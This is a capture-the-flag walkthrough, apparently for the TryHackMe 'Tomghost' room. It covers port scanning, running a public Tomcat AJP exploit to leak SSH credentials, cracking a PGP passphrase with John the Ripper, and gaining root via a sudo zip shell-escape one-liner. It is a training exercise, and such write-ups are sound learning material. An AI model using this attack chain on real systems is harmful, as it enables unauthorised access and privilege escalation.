# Tomghost ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXgJgM5EOGIYda5WwD%2F-MbXgWA172zTcvDlhRsi%2Fimage.png?alt=media\&token=f090c9d5-9882-410e-a064-feb8285fabc9) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.193.3 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXgJgM5EOGIYda5WwD%2F-MbXi-v9YgcsteTqSJ6g%2Fimage.png?alt=media\&token=9df05d75-2788-45ff-8b93-5d08abf10ece) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,53,8009,8080 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXgJgM5EOGIYda5WwD%2F-MbXi3vfxltcWYt0b4zT%2Fimage.png?alt=media\&token=b34ad7de-0bb1-486b-a177-ba556ca0fe43) ## Enumeration Lets visit the webserver on port 8080. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXjG9JC-TUz-kOPBfx%2Fimage.png?alt=media\&token=ac9f6f48-0f2d-4a7e-8f39-b2954cc3c18c) Its an Apache Tomcat/9.0.30 service page, we can't find anything interesting on this page. Lets look at the service running on port 8009 which is `ajp13`, a binary protocol that allows to reverse proxying requests from a Web Server to a Application Server. Lets look for exploits on this service. ``` searchsploit ajp ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXkxS54aHt9s6aa9A8%2Fimage.png?alt=media\&token=aae56c07-1600-4542-8fae-ea7daccd4328) The second exploit in this list is just what we are working for, so lets read the exploit and look at how to use it, to do this we need to copy the exploit to our directory. ``` searchsploit -m multiple/webapps/48143.py ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXlLHG-gB0ZyjZ-K3M%2Fimage.png?alt=media\&token=b3becee6-cce4-43de-8fec-b5c65a7b2bee) ## Exploitation Looking at the exploit, it just looks like we need to run the exploit against the IP of the target machine. ``` python 48143.py 10.10.193.3 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXlw904mqx53LOy8RJ%2Fimage.png?alt=media\&token=02c4bc86-9c99-419d-bacb-b7d66456116a) And we found credentials, we can use these to login through ssh. ``` ssh skyfuck@10.10.193.3 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXmDWKeSXrpbhPKT_r%2Fimage.png?alt=media\&token=ef31c04d-c25e-4b79-a7b5-9ed03d6dfa17) We can read the user file which can be found with this command ``` find / -type f -name user.txt 2>/dev/null ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXrcigiT-QyopG9jEH%2Fimage.png?alt=media\&token=a91973f7-16ba-43d5-a163-6b67d9c35847) ## Privilege Escalation Looking in the current directory we are in there are two files. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXnP9ZNWPviWDYoGlO%2Fimage.png?alt=media\&token=ebf39804-863c-45d4-a215-8e9cce7b9a26) One is credential.pgp which is a encrypted pgp (Pretty good privacy) file. The other is tryhackme.asc which is a `ASCII armour` file. First we need to import the `asc` file and then decrypt the `credential.pgp` file. ``` gpg --import tryhackme.asc ``` ``` gpg --decrypt credential.pgp ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXoiHBjCUI_UaHN3_c%2Fimage.png?alt=media\&token=290213f1-f1c9-4fb2-8c79-13dd6288ac7e) It looks like we need a password so lets first copy this file to our machine and then crack the password using `Johntheripper`. ``` scp skyfuck@10.10.193.3:/home/skyfuck/tryhackme.asc . ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXpc14rNurYaTdJGQe%2Fimage.png?alt=media\&token=6eb0baad-db1d-41bd-adf9-0edab3ca9df4) Next we need to find the hash using `gpg2john` and then crack it using `john`. ``` gpg2john tryhackme.asc > hash ``` ```bash john hash --wordlist=/usr/share/wordlists/rockyou.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXtpC5bcQ_pvmHajPr%2Fimage.png?alt=media\&token=bb4253a6-d1ca-4741-a0fc-fae48a962787) After cracking it you get the password `alexandru` Now you can decrypt the pgp file. ```bash gpg --decrypt credential.pgp ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXiB0ELJi21-dg4gxO%2F-MbXu8AaLbbakfb8RZ3M%2Fimage.png?alt=media\&token=9355c75d-be68-4117-84eb-54597357c7ad) We found credentials to another user, lets switch users to merlin. ```bash su merlin ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXuTprUPT15mwiu9Cg%2Fimage.png?alt=media\&token=d6332420-039f-40b1-b748-c4115c329198) Lets run `sudo -l` to see what we can run as root. ```bash sudo -l ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXuhL5C233xWxvBepp%2Fimage.png?alt=media\&token=c98b774b-b786-43ed-b12b-542533dab644) Looks like we can run `/usr/bin/zip` so lets go to [GTFOBins ](https://gtfobins.github.io/gtfobins/zip/#sudo)and look for the commands to privilege escalate to root. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXv7mXXIO8ZhHasEIU%2Fimage.png?alt=media\&token=564e0e33-12fc-47d0-9fa7-d5649507baed) Once we run these commands we get root. ```bash TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #' sudo rm $TF ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbXuB4iBgG49ogiewbW%2F-MbXvSgTJiRJoTA_Vqib%2Fimage.png?alt=media\&token=eca40433-07ad-4859-b645-ed6a9423ee21) We are now root and now we can read root.txt and answer the last question of this room.